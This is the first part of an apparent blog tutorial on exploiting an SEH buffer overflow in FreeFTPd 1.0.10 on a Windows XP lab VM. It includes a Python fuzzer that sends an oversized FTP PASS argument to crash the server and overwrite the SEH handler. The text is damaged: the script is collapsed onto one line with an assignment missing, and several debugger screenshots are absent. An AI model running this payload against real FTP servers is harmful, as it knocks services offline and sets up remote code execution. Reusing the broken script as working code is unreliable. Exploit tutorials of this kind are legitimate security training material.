SEH Buffer Overflow - FreeFTPd 1.0.10 - Part 1
In this blog post series we will look into exploiting a SEH buffer overflow for the FreeFTPd 1.0.10 application.
Therefore we load the application into the Immunity Debuuger on a Windows XP test vm. This operating system does not use memory protections like ASLR to protect from simple buffer overflow attacks.
We use this fuzzer to test for the buffer overflow to verify the exploit code and write our own exploit code.
#!/usr/bin/python2 # -*- coding: utf-8 -*- import sys import socket BUFFERSIZE=1024 if __name__ == "__main__": maxbuffersize=10000 buffer_inc = 5000 bufferarray= buffercount = maxbuffersize / buffer_inc IPV4='192.168.0.137' # IP of the windows xp VM PORT=21 # running process while len(bufferarray)< buffercount+1: bufferarray.append('\x41'*buffer_inc*len(bufferarray)) for buffer in bufferarray: CLIENT = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM) CLIENT.connect((IPV4,PORT)) CLIENT.recv(BUFFERSIZE) print("Fuzzing with %4d"%len(buffer)) CLIENT.send('USER anonymous\r\n') data = CLIENT.recv(BUFFERSIZE) print("data: %s"%data) CLIENT.send('PASS '+buffer+'\r\n') data = CLIENT.recv(BUFFERSIZE) print("data: %s"%data) CLIENT.close()
After running said script with the right
PORTwe will get an overflow which will look like:
And in the registers we will see something like:
We can now also verify that it in fact is a SEH overflow by opening the SEH chain for the exception:
We already overwrote the SEH return address with the current buffer. Now we only need to find the offsets for said addresses.